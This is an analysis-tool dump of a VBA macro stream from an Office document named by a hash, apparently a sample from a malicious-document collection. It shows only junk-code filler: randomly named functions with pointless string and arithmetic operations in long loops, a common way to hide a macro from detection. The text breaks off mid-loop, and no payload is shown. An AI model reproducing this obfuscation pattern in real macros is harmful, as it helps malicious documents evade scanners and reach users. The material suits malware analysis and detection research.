Filename     : ./macros/1312c24e03558211624cfc1d394fc2d548fb36a907e241ece30473d7bc6d377a
OLE stream   : Macros/VBA/ThisDocument
VBA filename : ThisDocument.cls
----------------------------------------
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function MJRVDV(aVQAydA As Boolean, rLszcc As Double, dPBzGp As Integer, rOQiIoc As Double) As String
    JEzwSA = 1273 - 124 - 1430
    Hkuan = Left("qA!H$.h-#(GZ", 3)
    jSFWWI = RTrim("msVVbwBgB[&QthT[WM")
    JEzwSA = Space(7)
    EsYdIQTR = Right("v_cSBnv)NuSYvHAQ!]DY", 3)
    Skjamx = RTrim(".#KO@_ta]NS_LRx")
    Skjamx = UCase("WST%#Per#quhbPA]")
    jSFWWI = 1149 + 289 + 784
    mPeWO = Left("RJrdALEte#pjLPppdNDP", 4)
    jSFWWI = UCase("hiGy*#GzjZyDC")
    For ToXuwN = 0 To 86
        JEzwSA = 430 + 271 + 1430
        Skjamx = 1278 + 297 + 898
        jSFWWI = Right("urWhb S]DCe", 4)
        rFNVbb = "wZ$]NU@gM&bfZU]" + "W[_&&H[*ipi%.)ek" + "q_pYS] Vb?g#%@i"
        Hkuan = "uw])LVYH)YY$Uzc[" + "pQ_JM!*ZbC" + " zvSvTWRMNb&"
        Skjamx = Space(10)
        mVgKFL = RTrim("_tU&$&IFskmcBBZ ")
        JEzwSA = UCase("_VrN NbmlTShZKxAsF")
        Skjamx = "faX-FCQ&yBy" + "suxHWz.T(_PK#PA(V-W" + "*_D&wCKTRBQI]uHlTqr^"
    Next ToXuwN

    jSFWWI = LTrim("i?fS?Mkycrxh!y^ ")
    EsYdIQTR = RTrim("YfBW%%rbDYPNA-Uvr")
    mPeWO = Space(10)
    For dEYDSC = 0 To 120
        rFNVbb = Right("ARuBlM@%nY", 2)
        Skjamx = Left("*A_?QCfpRrie$A&qV.", 5)
        rFNVbb = "BOziYB^n!eHJP&" + "Y#E*eWBMM(YcHLKR-Td!" + "lx#L ottxiC^tRzga-ek"
        Hkuan = "fRlTnJx%X.NaEwQx" + "y@H&T-he#*eOBD#l" + "EP-#ENeKXUh_#A"
        JEzwSA = LTrim("[(NbO-dk!ie.YQ@UAJ")
        JEzwSA = Right("U-]mWlCoZT!&y*k", 5)
        mPeWO = UCase("E-HykWXOT)cRlH)QyR")
        mVgKFL = 726 + 469 + 1471
        mVgKFL = Left("rg%@w?*hB[pp^t?e)j", 4)
        mVgKFL = "KTe%hLxnGs_iGcp?n]N" + "RedkS(Yhg*S%uf" + "ELBxK hyTjFKNSk(FSD*"
    Next dEYDSC

    JEzwSA = "Bz.JPhZ^P^]FNieKWna" + "GOADF)XRrItc" + "OpE@TZ^Z-x?_KgpNnfR"
    JEzwSA = LTrim("PXJYWmTbjXOU*")
    jSFWWI = Right("M[(yPvVxPpyiComc", 4)
    jSFWWI = LTrim("I)NxlNNKceZgVF. ")
    For oEeZUS = 0 To 239
        jSFWWI = Right("eP[]AAN[C-E$nXE", 4)
        EsYdIQTR = ".zaDQToOUU^Usj#O" + ")&QRzD-a$t&K" + "*vYO^z]g)YNcrvl&KY"
        jSFWWI = UCase("Mc^gCIE(*_$Kdyq$?ko%")
        Hkuan = Space(18)
    Next oEeZUS

    EsYdIQTR = UCase(")j$#w_nfRSvL&&l")
    MJRVDV = "rsRgZztaWHvDVlEacxYOf"
End Function

Private Function gQVETE(TDgssE As Integer, LRJllK As String, GATxont As String, EgOmikv As Double, Ddjnsz As Boolean) As String
    JEzwSA = Space(9)
    mPeWO = Space(15)
    Skjamx = Left("FqqJFN_gDzJhc", 4)
    jSFWWI = 1509 - 940 - 1661
    Skjamx = StrReverse("_SlPSKqWV&n")
    Skjamx = RTrim("O IX[[?@jRzxMBd.")
    JEzwSA = Space(7)
    jSFWWI = Left("M.G*wAUGLH^JWvr%Hliw", 4)
    Skjamx = Space(15)
    JEzwSA = Left("PrgI!I_er( ]flJGqy", 2)
    JEzwSA = Right("$i(z@JmteMnmH^u", 5)
    jSFWWI = Space(14)
    Hkuan = LTrim("BzqRazapSo.bGfTugA_")
    While GdOLTt < 189
        Skjamx = RTrim("UM^fZs[u^oKu%G")
        EsYdIQTR = 1602 + 1522 + 460
        JEzwSA = "?@qyt*PwT$vqlU" + "lftzzcJCnVS_Al)esL" + "Hze)g.#Nq-_)W?LPSA!"
        EsYdIQTR = Space(1)
        mVgKFL = Right("VIFi_AHTiS)C(nWsy", 2)
        mVgKFL = 983 - 157 - 809
        JEzwSA = StrReverse("Ww qqe(fld.@hdOx^DzK")
        jSFWWI = Left("@hn.TeKHIEtIU@GHkt", 3)
        mPeWO = Right(")a[AyerZLVKrwnnR", 5)
        GdOLTt = GdOLTt + 1
    Wend

    Skjamx = 1312 + 1070 + 1713
    JEzwSA = UCase("wY.@hcdE#jYJWegr(")
    Skjamx = RTrim("irqRw%ZpRH$FPFD.#]?")
    JEzwSA = 968 - 1597 - 1582
    JEzwSA = "FsirGGP&]$?zujd" + "zEnVjTK#)Rmqh?Mr" + " ZmnnZ%RcHeYR)_GPl"
    While Sbfggp < 170
        mPeWO = UCase("UnyPbu?[x*elg(w")
        mVgKFL = UCase("^#J%pP?HrFu#HCYA%x-o")
        mPeWO = StrReverse("ebHo(b&oYT")
        mPeWO = UCase("(XtQphko)YgMpq")
        Skjamx = Left("j-EpTZgm^dLK", 4)
        mPeWO = 278 - 829 - 1913
        EsYdIQTR = Left(".wpnTEStGY", 4)
        Sbfggp = Sbfggp + 1
    Wend

    JEzwSA = StrReverse("LKwKfx@U%T")
    EsYdIQTR = 1288 - 976 - 376
    mPeWO = LTrim("mMT^JzhjbLG-?Nz?YJ")
    mVgKFL = Space(18)
    For RLfaHa = 0 To 151
        jSFWWI = "NYpWkTIRg?*B[A#dG%Q" + "MqDrj@ONGkFwCd" + "#iP?Ug.)%w]aC&b@qGPF"
        Skjamx = StrReverse("PTd_V!PG))?z$HmpUOWe")
        rFNVbb = UCase("@Y#ZAZMKS.SMIPqH_")
    Next RLfaHa

    EsYdIQTR = 1063 + 210 + 1718
    Skjamx = 1655 - 383 - 488
    JEzwSA = RTrim("Ts^rHqgO s!LBp")
    Skjamx = Right("waFLihm)x&hAqAmFFb&", 2)
    Skjamx = Right("ir?gB[XzLtvN#", 4)
    gQVETE = "wdVQIggppdesajFsURFbquLqZjMoNj"
End Function

Private Sub tjtCPA(uRqRLf As Double, wBmeoW As String, Dnopezx As Integer, fYsXfa As Boolean)
    Hkuan = 912 - 1134 - 1037
    While SFuosk < 21
        mVgKFL = UCase("^UuBXIBF.%[pxy")
        rFNVbb = 1066 - 591 - 1657
        Hkuan = UCase("fo?b?L.SSPn")
        jSFWWI = "uWBVYtPP?_VSX" + "Gc^!c^Plwh&" + ")!Uk)OC?jebhO("
        Skjamx = "DVt UkQb&?dz_iZ" + "*IwmHIuhu@ _fDWUu" + "tpFu-ccfGcN&?S!"
        Skjamx = StrReverse("^w(Er.FIoQWsx_ZtLo")
        rFNVbb = RTrim("$ ovD.M(n-QB")
        EsYdIQTR = 1568 + 1932 + 1526
        SFuosk = SFuosk + 3
    Wend

    EsYdIQTR = StrReverse("OLT?vo SMsQsOTP")
    For uLYxRJ = 0 To 242
        jSFWWI = Left("Z!mBvmysTJbIM(NA", 3)
        Hkuan = RTrim("^LRtjnet]WXGX#ozRA")
        Skjamx = UCase("fmgf?^PNji[gcvW^[v")
        Skjamx = 770 + 203 + 885
        EsYdIQTR = LTrim("U$m@Wk.HGqX")
    Next uLYxRJ

    While JFobNB < 84
        rFNVbb = RTrim("niBj!UWR.ZQenJc_")
        mVgKFL = RTrim("w^ehnTO%Ryo$H@s")
        jSFWWI = 1666 - 1838 - 1010
        EsYdIQTR = UCase("EmUb_oF)OvDRb")
        Skjamx = Right("rMexEh.@J$$vmG_q%", 5)
        jSFWWI = StrReverse("&ptYrdawB-$Hx%weqz")
        rFNVbb = Left("#_ryKNtn^F!", 4)
        Skjamx = "r tzPk.jbgv" + "fn.cpdE.&DVAD" + "C@xWZE))adMnUbJo"
        JFobNB = JFobNB + 1
    Wend

    EsYdIQTR = Right("GStysQCZ#wUE!syr_JJ", 4)
    EsYdIQTR = Left("*jBfjeYZwIUP_v*dFpN$", 4)
    For lRNDHP = 0 To 209
        mPeWO = RTrim("DQTowNJF[%W")
        Hkuan = RTrim("H)H%lThiHzrWWT#oiO")
        EsYdIQTR = 1770 + 1557 + 1273
        Skjamx = "pbi?L%[iYutl" + "^WdXB$?tT@$mD&^.ax[" + "GOZMX[cBAUY"
        jSFWWI = LTrim("G_uDOtusQzLp_$n-.")
    Next lRNDHP

    Skjamx = LTrim("hFz[f!zorn-jnQbgU)S")
    mPeWO = Right("q@V]HuMKL]IvgI", 2)
    Hkuan = Right("ZcS@g%XgP.YBe", 2)
    mPeWO = StrReverse(".a%ApM&f_nxIEO%$Nvs*")
    EsYdIQTR = Space(15)
    mPeWO = StrReverse("hY)fbR$TqO")
    Hkuan = 891 + 1587 + 204
    rFNVbb = RTrim("*Wn!Dm@aSaxmLZAN$]")
    mVgKFL = Right("?j&JIAkyyAvF*PGpOxT%", 2)
    mPeWO = Space(2)
    mVgKFL = RTrim("^rFrz]XcgXPlhv_R#b")
    mPeWO = UCase("H!#sW&Mvai")
    Hkuan = StrReverse("(soG&t%_YbA&is#tGEQ")
    JEzwSA = "qIASPpE_s[" + "cQI(cHtTdNbLMKGV" + "upg_oiU j)!QDh"
    JEzwSA = 1992 - 580 - 673
    While cqrrVe < 300
        Skjamx = LTrim("?FCGzE?qf%j")
        Skjamx = RTrim("?wWbUp.qS&")
        jSFWWI = "aE.XvVR%OH*w@BXNff" + "]aez_txVWSrz^Ml@vLs" + "KaJX&.@ErCK"
        jSFWWI = LTrim("GFesMGWgHMuYWV&I&OEC")
        rFNVbb = Left("vtCsDWB&m[", 3)
        mVgKFL = RTrim("EF[@c)Is@u@-sObl]")
        JEzwSA = Right("-ghAfZ$_Pj", 4)
        rFNVbb = Left("KjEf%$qxQRSXg?eIiWio", 2)
        mVgKFL = RTrim("YRLWAL[iz.s!RJVc")
        rFNVbb = 1124 + 1838 + 676
        cqrrVe = cqrrVe + 2
    Wend

    mVgKFL = 1311 + 1395 + 1261
    For ibooNd = 0 To 388
        Skjamx = Left("IwYs*Gnh#U&tsivdAs", 4)
        jSFWWI = Right("muJvTcZeO ", 5)
    Next ibooNd

    mVgKFL = Left("&MQP@VYKZz*hu", 3)
    Hkuan = RTrim("(qVZp*z(o._K")
    jSFWWI = RTrim("$k !_^qkaZlWTBlK")
    mPeWO = Space(9)
    mPeWO = Left("uA&r?lkYv#a_ ", 2)
    While NhvpxX < 320
        Hkuan = "Vdve?_Y)V)Rxyxzg_R." + "UaNx_zuCAx!ZbO#t.Y" + ".WuL*yW$]L%E ZAiy"
        Skjamx = Right("p TeXm^b^%TUcu#l", 3)
        JEzwSA = 745 + 1526 + 1088
        jSFWWI = Left("H?GbjFnuMU? ", 4)
        rFNVbb = LTrim("xMRXvyzQcoc")
        Skjamx = Space(15)
        NhvpxX = NhvpxX + 3
    Wend

    Skjamx = RTrim("]ouz^hf-ibs&P$.#YGz")
    rFNVbb = 164 - 917 - 937
    JEzwSA = Right("kEmfHA@lJ]!DR?@eh", 5)
    mVgKFL = 1155 - 1000 - 659
    Skjamx = "oI@.?jNNFMhzrRYO I" + "Bfck- *Mx_a(kcftMjvb" + "#C&SoReosvW?]GHr&n"
    EsYdIQTR = UCase("DS-K-B#YnOcwCUu")
End Sub

Private Function vemrbj(wpaGZfB As Boolean, vUteUg As Integer, MjeQIbi As Integer) As String
    EsYdIQTR = Right("z_gZ#WOVEnW-Nj%", 4)
    mVgKFL = Right("FZEwbLhD$)io-_h", 4)
    rFNVbb = RTrim("Imp?[ZLdm!.Jxk")
    Hkuan = "kG$)dn]hsQyIJA*E" + ")&Oc&UFuAQusX!Ac^" + "-cy@qpCe#b]zSM"
    JEzwSA = "fgQEMSG*$V!" + ")L-[WAQ[$^*AsUsCwO_" + "TYx$)_[F@?%f]aG"
    EsYdIQTR = LTrim("cX-L-!jjX?lAkrJV")
    Skjamx = UCase(")wXOEBGqAu^mg")
    JEzwSA = UCase("]eL[E#Ku$_(Q.AQdY-")
    Hkuan = "!S-tXb]ZhHNI A" + "hwd^I#@ECvIY[$RFgFAQ" + "e!b_&Pzu$b"
    Hkuan = 395 + 364 + 1460
    EsYdIQTR = LTrim("$yyVMA$R !)cV?")
    Skjamx = LTrim("k&^@l- M(EW&")
    Skjamx = RTrim("_npgQlf_yq[aSd[Kew[Q")
    Skjamx = Left("KlKnjs-.?lBbZZbnKS", 2)
    jSFWWI = 1018 - 1228 - 1980
    jSFWWI = UCase("gn!tkLU!wLJgShUYqb")
    mVgKFL = RTrim("mfISz JuFYn")
    JEzwSA = LTrim("R(A#PQMazUV")
    EsYdIQTR = UCase("oPf-e_VLLFKIya.#HF")
    mPeWO = Right("vfIt@Fy^&q]qYZ(?Cm", 4)
    EsYdIQTR = 1960 - 920 - 547
    mVgKFL = UCase("fB-Qnuoll_We!")
    mVgKFL = 1319 - 746 - 390
    rFNVbb = UCase("nvCKwcClFDDK-ur?")
    mVgKFL = UCase("Sw#EQ @)wah")
    rFNVbb = "&tOTQixZjwRgj" + "QSsXodQ#C&.pWd" + "Rh&@IJNJ ?!E&bb"
    Skjamx = RTrim("SCFMBAZg*GTVc")
    rFNVbb = RTrim("!uC$GDwl?aX_JP(#fw")
    Hkuan = 1181 + 220 + 1651
    JEzwSA = StrReverse("otBirZh?Fu@U")
    rFNVbb = Left("qTyj*ayuK]", 3)
    rFNVbb = LTrim("k_tsYjyMhs%hod]TPT")
    Hkuan = RTrim("o!cKcJ*pnc#]&vfxs")
    mVgKFL = 1039 - 1431 - 644
    Skjamx = Right("UKY$m$ViK]S", 2)
    Skjamx = Right("eN_[W *bAfDzC!Wmt)q", 4)
    mPeWO = Right("-* mMU#hUk", 2)
    vemrbj = "vuiPoSJlpfngrlpZoleztFEDHrlLwBGgndKaE"
End Function

Private Function uaBOyj(kcawAfz As Double, ECBITPp As String) As String
    jSFWWI = RTrim("#tjw%iwm(L$.[")
    rFNVbb = 1829 + 294 + 1871
    Skjamx = Space(3)
    Hkuan = 1836 + 1665 + 1868
    JEzwSA = Space(14)
    mPeWO = RTrim("?@q_IAhRG(IiomE")
    While GNhsTP < 235
        Hkuan = RTrim("zEPWJhXLn! dl (")
        Hkuan = Right("FfJgjL_n)EIJ", 2)
        GNhsTP = GNhsTP + 1
    Wend

    Skjamx = RTrim("zlT_dpv@f#wl!s")
    jSFWWI = 1992 - 854 - 1001
    EsYdIQTR = 798 - 1015 - 1614
    jSFWWI = Left("y&bxgC-EwV", 2)
    Skjamx = RTrim("c#N.TC$nzm!j%$JqxH")
    Skjamx = Right("S_hZMqJvlQ", 5)
    rFNVbb = 1383 - 186 - 147
    EsYdIQTR = UCase("^Hn(_ v#k[]&JsNgHyhq")
    mPeWO = UCase("J$qvkB$VbFmeglD")
    Hkuan = "Qqq#Jm_.Js .Wh!q" + "^YRFSyVNvGall" + "w#k*H]tnIOuQkJ"
    Skjamx = Space(5)
    Skjamx = LTrim("iZf..@HE*[RaMAXE")
    rFNVbb = 1184 - 1773 - 1063
    JEzwSA = LTrim("x&aAaK_(NAMc *n)G")
    EsYdIQTR = UCase(")WN[leuc_)G-a#*m(sPe")
    Skjamx = LTrim("gCWx&?W-QKXDx%C")
    mPeWO = Right("EhGBUBzbuB_NPS$Z", 3)
    JEzwSA = StrReverse("ZsqLXvJH.wJN")
    mPeWO = LTrim("fWDKgNLQsBbLQKz")
    Hkuan = Right("pqXW(rjb&krhsoq[ahnl", 2)
    rFNVbb = Space(16)
    JEzwSA = Space(13)
    While oZLZOG < 58
        rFNVbb = "%pw#?OdYmRx-lI" + "UChmYZg(qsBf" + "_jsdT**VHI*&qPO"
        Hkuan = LTrim("wfurqBQxImC!vU")
        jSFWWI = 251 + 1416 + 1007
        JEzwSA = Left("rm)vl%%wwm", 2)
        mPeWO = 1599 - 642 - 949
        mPeWO = Left("HFxSYu_GfBDn", 4)
        rFNVbb = Left("D.*sM(qE-]LIWd$", 5)
        oZLZOG = oZLZOG + 3
    Wend

    EsYdIQTR = 951 + 1937 + 336
    JEzwSA = UCase("YLYbKJu.rgLpQdj-")
    rFNVbb = "rlZoi*!.FSDC FG&" + "(z$PH@EJP.qvXH" + "O!N[a?pMFu"
    JEzwSA = 757 + 429 + 167
    mVgKFL = 1402 + 1608 + 1526
    For RjCWhV = 0 To 297
        jSFWWI = Space(2)
        mPeWO = Left("Jcm)bj$RHV", 2)
        jSFWWI = 1813 - 1366 - 217
        mVgKFL = Right("iixetpkk(?un", 4)
        EsYdIQTR = Left("$FAFs. GHApD_KZckekt", 3)
        jSFWWI = "SkH#vAd(?Z#J?" + "z.ybInwNPOEZ.xuQI?gK" + "hc-NeZ_$j!mSnVmIYiEY"
        Skjamx = "$sP CA h?cI" + "?*(]^P*of[zKhVWO&Bt" + "aOVKv%u[lqBMK#p?"
        jSFWWI = Space(3)
        mVgKFL = Space(13)
    Next RjCWhV

    rFNVbb = UCase("WYkuWtt&CydPnc?APNck")
    uaBOyj = "tCeGBwVPJfWthqnxVVKprwAuYuthSBhmBIbUE"
End Function

Private Sub XMBCpk(kaoCCAD As String, HEATKn As Boolean, csoaFyq As Boolean, XBpXUJ As Boolean)
    mPeWO = 1689 - 1563 - 1513
    Hkuan = 775 + 964 + 575
    EsYdIQTR = UCase("mTFLyrts%)")
    Hkuan = Right("kDdkCV]e_NMHTQtXp*oM", 3)
    For pGFiBv = 0 To 46
        rFNVbb = LTrim("w!#]SRiZ(EeJdL?")
        Skjamx = LTrim("JhS^BRuhmHjGiHFW")
        Hkuan = 260 + 817 + 180
        JEzwSA = Space(16)
    Next pGFiBv

    Skjamx = Right("UencdClsHaMfq", 4)
    While iSfgaR < 385
        rFNVbb = 861 - 1763 - 999
        EsYdIQTR = LTrim("^[B&-adGhW@f)Rb(QZd")
        iSfgaR = iSfgaR + 1
    Wend

    mVgKFL = 1427 - 1544 - 1134
    Skjamx = StrReverse("w@(-Oia*$HqG)Y")
    JEzwSA = UCase("*NvCxWfHCK% gM!v")
    Skjamx = Left(")#KN(ZK.lsF$H[GRRE*F", 5)
    For Fmkbck = 0 To 63
        mPeWO = "qY@-y!]Uenb" + "s?@NTyf!ih" + "ks^zGSbHlZbJ^?Om]b"
        mPeWO = Right("Qi*kqQS-CR", 5)
        Skjamx = Left("HW&bXsYSACS#^^SAbO&f", 3)
        Hkuan = "?X!btRAMAd??#w%" + "!%gF-CM_q#" + "!qvuE!IiEkgJ"
        mPeWO = UCase("ssAO#Hy]Gc-NfG")
        JEzwSA = 204 + 554 + 1978
        Skjamx = LTrim("C&EzC%zEEZeRp ")
        EsYdIQTR = UCase("FzHyhRxnoNRxQa&HAMM")
        mVgKFL = 489 + 531 + 842
        JEzwSA = Right(" KpyXDuNeKp(&*b", 2)
    Next Fmkbck

    mVgKFL = 257 + 1151 + 615
    Skjamx = 1992 + 876 + 437
    Hkuan = 1059 - 1669 - 811
    mVgKFL = Left("E!bdE&yCz]RuiiI-", 4)
    mPeWO = Space(17)
    jSFWWI = StrReverse("iGBLu[OX)g")
    jSFWWI = 1421 + 1083 + 260
    While KuxguX < 370
        Skjamx = "ZUSkDZ.ebl[tLH" + "XSaH Py!ZD_" + "a a%Pm^Be "
        jSFWWI = Space(9)
        Hkuan = Left("Jm_uwLhJ-kqIyt", 3)
        mPeWO = "PF%v#$Ymy[P" + "EMZE^ud@&l?!p*FJo" + "^Rkj-**mJ$I"
        EsYdIQTR = Left("s$-$HI]O*v%![SS%n%", 3)
        mVgKFL = RTrim("OLY DN N zQdgT%")
        Skjamx = "%kBrV[%!oSM^l" + "OIRkEY-I)m]s[ZYtc" + "j$^SXwfBWzegq"
        EsYdIQTR = Left("UfmmLAPqVf]zcTrZ^", 5)
        Hkuan = Left("yI!qk^q*GBM?p#N$QK@", 2)
        Skjamx = "x(F#uHE) iZI#mVs" + "eHjMt*PnoqVGk$-YXw" + "LePsKWxaMDtcAU[HmM"
        KuxguX = KuxguX + 2
    Wend

    mPeWO = Right("WWO)S[^y.sH?Nm@d%", 3)
    EsYdIQTR = 224 - 1043 - 1135
    While KuAbqC < 353
        mPeWO = Space(5)
        Skjamx = Right("KtS&&nmkH#lphfEM[ Lu", 3)
        jSFWWI = Left("eRVVqi(.Xcn *YFAck!V", 5)
        rFNVbb = 1067 - 568 - 1798
        JEzwSA = UCase("#$JIl_IOLWza")
        Hkuan = Left("?)]T@*$oT^AX@G", 5)
        Skjamx = Left("vBIN_mvm*CxURtp.I^-", 5)
        KuAbqC = KuAbqC + 2
    Wend

    Hkuan = StrReverse("mTTH%Zz&$hUTT%f")
    JEzwSA = 1200 + 825 + 720
    Skjamx = Right("hVDgO^OC yEk", 5)
    Hkuan = Left("DnXUgrZ%cU", 3)
    mPeWO = Space(13)
    rFNVbb = Space(1)
    Hkuan = LTrim(".OItHVK)c&P")
    rFNVbb = RTrim("$dheLs]evO")
    mVgKFL = StrReverse("?ZNb)_utAm")
End Sub

Private Function mXeCRD(GzHfPG As Double, EgaPPh As Boolean, iCTpsRw As Integer, MouBry As Boolean) As String
    jSFWWI = Left("?rWeBUpbEc", 4)
    For wzzbbQ = 0 To 37
        JEzwSA = StrReverse("RARYwDTN$D@.")
        EsYdIQTR = Left(".!x]q..I(r^", 4)
        JEzwSA = "!wrH$Y$](Z*hkJxJAh(" + "tXl%eoc^AanR]%e" + "E$XhnoktBXabBSCz^_WP"
        Hkuan = UCase("z*#?])XTRVfNW^Q")
        JEzwSA = "fngs.T .zmOoH%OY" + "FOe.R_Z%D)" + "HDv_lgQcjcMcsq@B"
    Next wzzbbQ

    mPeWO = 1339 - 1656 - 1403
    mPeWO = "[qY-F.U]B)F" + "Rc.sp%Gy&s" + "df#PGg[qM^S"
    jSFWWI = RTrim("TVkc$MJ!)yXbW]#")
    While LQLXPK < 246
        rFNVbb = StrReverse("l.#ZjgZuKDt!D)NxvAhR")
        rFNVbb = StrReverse("wlXWpTr*_jAB")
        jSFWWI = Space(8)
        jSFWWI = Left("j])xL#-aUUZ^L-DID@Sd", 3)
        LQLXPK = LQLXPK + 3
    Wend

    Skjamx = StrReverse("vFB---KfOD")
    Hkuan = 1013 - 1252 - 1133
    mPeWO = "IWtvuw*zTxXAlF[a?mY" + "XP[qYup)GVGZWGcuXe" + "$TRiclukM%aY "
    mVgKFL = "zWv&QkFefx?oP@" + "c?MlyG$ur_*s(zCR" + "jI^V ^)&NSJP"
    Hkuan = UCase("ZAuF?yuGB@C.k")
    EsYdIQTR = 1557 - 183 - 1717
    rFNVbb = RTrim("MTafZOzNiy#ZLhL]@jo")
    Skjamx = "SemHuwbnDVi_cgO%pMGR" + "[zgo-&HDpWZgc-sqg$_m" + "KDGTXVod^y(X"
    Skjamx = Left("NrxAjoHQKeVrs]%Fs(S", 2)
    Skjamx = Space(4)
    JEzwSA = 124 + 1521 + 375
    Skjamx = Left("uyS%khHynts*k", 3)
    rFNVbb = "gPfbGrvKGZibwxvtlcv" + "CT_U*S$Qy.]h[jN@_ZgX" + "MQ)[i#wDuYpy"
    Hkuan = 1420 - 1501 - 1468
    While Mrgtxo < 96
        mVgKFL = Space(19)
        jSFWWI = LTrim("sboK&%rtaBQQN")
        jSFWWI = StrReverse("SPpYCJf&aJN[ozFA_F")
        EsYdIQTR = StrReverse("ugJLYGQsbLlcGv@r*^IR")
        jSFWWI = 1464 - 1921 - 404
        Mrgtxo = Mrgtxo + 3
    Wend

    JEzwSA = 1202 + 1063 + 759
    mVgKFL = LTrim("CFJwpjVabQb$")
    Hkuan = Right("AtBzSlLo$uIg!e*MtW", 5)
    Hkuan = UCase("%RTIL[zZRM#CE^cNghdM")
    Skjamx = RTrim("-Pbmd!$)JMXSMv")
    mXeCRD = "yGbAqlxKAytWeucUBQREMyMZCj"
End Function

Private Sub lqonvh(UeEeDq As Boolean, djShExJ As Integer, ixBQRrl As Double)
    Hkuan = RTrim("%tUS)IPqvLjLr ")
    rFNVbb = 582 - 1776 - 1374
    Skjamx = StrReverse("NPh&HIgoyS")
    JEzwSA = StrReverse("KuEGtMM]V&^WZp]SHh")
    rFNVbb = RTrim("lPC_busPIC?")
    Skjamx = Space(18)
    JEzwSA = 1861 - 1282 - 737
    Hkuan = LTrim("cWIm!FaSk!aK%_vLP")
    Skjamx = Left("%RP^jXm]VR", 5)
    EsYdIQTR = RTrim("VyQR!Mrc!OO.*BC")
    mVgKFL = UCase("SbuVKz!s*QlJx[WmafP")
    EsYdIQTR = RTrim("X(dCnl]%^M")
    mVgKFL = RTrim("woM@$HoGZ-@lQv*wPABi")
    rFNVbb = Right("eF!f^-O-PN.W]", 3)
    JEzwSA = LTrim("u&inRH]aYb]")
    mVgKFL = Space(17)
    jSFWWI = UCase("di?T?RAH]MhPC*")
    rFNVbb = LTrim("c%!LmsjUy@")
    EsYdIQTR = 1388 + 1121 + 868
    Hkuan = 683 + 669 + 687
    For nkQheM = 0 To 121
        EsYdIQTR = Right(")FIxjvmJ(O", 5)
        mVgKFL = RTrim("?n*JocA%N.Z")
    Next nkQheM

    mVgKFL = 159 + 523 + 1511
    EsYdIQTR = 527 - 1559 - 440
    mPeWO = Space(16)
    EsYdIQTR = StrReverse("(]w_)me[Ia&Xlb-")
    Hkuan = UCase("jtd!iVlU(le((yWqM")
    Hkuan = Left("iCKvmH*NlK$TCQ(rip", 2)
    EsYdIQTR = UCase("uHE.*mqrBH)GQ$mQLGJF")
    JEzwSA = Right("*)gEMd(-Oq.vXusxGZ]", 3)
End Sub

Private Sub mpNCwk(IJuQIfu As Double, RlLSkV As Double, IiSRbTX As String)
    While aYpsvt < 218
        Hkuan = 1872 - 1669 - 1253
        JEzwSA = UCase("(HDlJ@k[-YeDM!Ue$n_")
        JEzwSA = Left("ZYUSTsnl]l#", 5)
        JEzwSA = Left("GP-%yqMFu!Gqm.K", 2)
        JEzwSA = LTrim("_WyA(SD]unnr]lBE")
        mPeWO = 443 - 1737 - 468
        JEzwSA = UCase("kexI$-%RKL(CAnC")
        rFNVbb = Left("psliAGVEHzdgD", 4)
        EsYdIQTR = LTrim("kVduaRDi?tM")
        Hkuan = 456 - 131 - 1028
        aYpsvt = aYpsvt + 1
    Wend

    mPeWO = LTrim("lzMoEutj-a")
    rFNVbb = LTrim("QANusW[!ddV")
    EsYdIQTR = 868 - 401 - 1291
    mVgKFL = Left("@WOmnGSc%K%GYPbh?v&O", 4)
    EsYdIQTR = 1820 + 1749 + 1376
    Hkuan = UCase("sRfVyQXDKOc&IZQ")
    mPeWO = Left("uaQ hX.rvuaSMBj*w_", 5)
    JEzwSA = 1885 + 1091 + 1007
    mVgKFL = Right("wzFcLTd@mG", 3)
    Skjamx = Right("(ghwfc**?!](D", 3)
    rFNVbb = UCase("WqyIsw@#S#UAC")
    Skjamx = Right("e_fHi_ZCUERH#-", 4)
    rFNVbb = "x?[p-_kzSmczH#YO" + "OdqB^ws*G%" + "UYVuM.Q%@KuYpNlpRL"
    jSFWWI = UCase("l)?!mla_sQI")
    mPeWO = LTrim("r^kS%-Rua*l &Zg#VD")
    EsYdIQTR = Left("nkeOcv@.Tm(U", 3)
    While qIZEoO < 387
        mVgKFL = 964 + 1904 + 1713
        Hkuan = Right("[t&uEz_jr*-a*z", 3)
        mPeWO = UCase("Jd.D_xyy.[ ^va(D*")
        JEzwSA = 1207 - 1371 - 1367
        rFNVbb = 1852 + 1505 + 807
        rFNVbb = Right("wNn)tO)E% ME)vsM", 4)
        jSFWWI = Right("zL^ihLP(kjZ-hzMp!VQ", 5)
        qIZEoO = qIZEoO + 2
    Wend

    mPeWO = StrReverse("Ue*xMqdSqGoAnf]Q&")
    While IOEyPo < 50
        Skjamx = 1853 - 120 - 1264
        Hkuan = RTrim("rE]Edot%LL)Bihn")
        mVgKFL = "GNNgLeMY-*_tsbMX" + "gFCE-DYuxgcbm@]wKq" + "RFYG^SjO_ZA)(s-^s("
        IOEyPo = IOEyPo + 3
    Wend

    rFNVbb = 807 + 1814 + 565
    JEzwSA = StrReverse("r*GmmfE-D^?.A$[y")
    mPeWO = Right("%wGDmRNeFMti.rK-", 3)
    rFNVbb = Right("T]-&nuZXwp", 5)
    EsYdIQTR = RTrim("Mmf?(B A BuFF_q")
    While OaEyCT < 272
        EsYdIQTR = "y(CXxWqTNx!Ju-a" + "pYNTsGB[n@i!lC#X" + "MeT?vcvGwv#TsEnVoge["
        JEzwSA = LTrim("k?!dVXfof-")
        rFNVbb = Space(8)
        EsYdIQTR = RTrim("Cb ]TfRgdziG^")
        rFNVbb = StrReverse("ph)ZGTI$oSqIjg")
        mVgKFL = Space(3)
        mPeWO = "L)a^bLGRIgwhm-jrXn&k" + "VSIIdD-S!.es!EZ?aBN" + "$F?lx(aZ_lp&lrZJn@y"
        OaEyCT = OaEyCT + 2
    Wend

    Hkuan = "F_nzb!!E?D!eLHRO]H" + ".XlYbMSWF @m-" + "@os!_IzVo(jZ!"
    Hkuan = Space(1)
    jSFWWI = Left("AZVmPYmdiOrm q", 5)
    EsYdIQTR = Right("g_C(Anqae]siO.]ju", 5)
    mVgKFL = Right("$u[uM]?wD&@@k[rDR", 2)
    mVgKFL = StrReverse("aergT]Sk.kyBN-e")
    For kEYjZq = 0 To 81
        rFNVbb = Right(" ]GOWlbmr.N[MYs", 5)
        rFNVbb = "IO@pabv[od!" + "S!&!MTEaTzXU" + "lGgLR-&.Pbj"
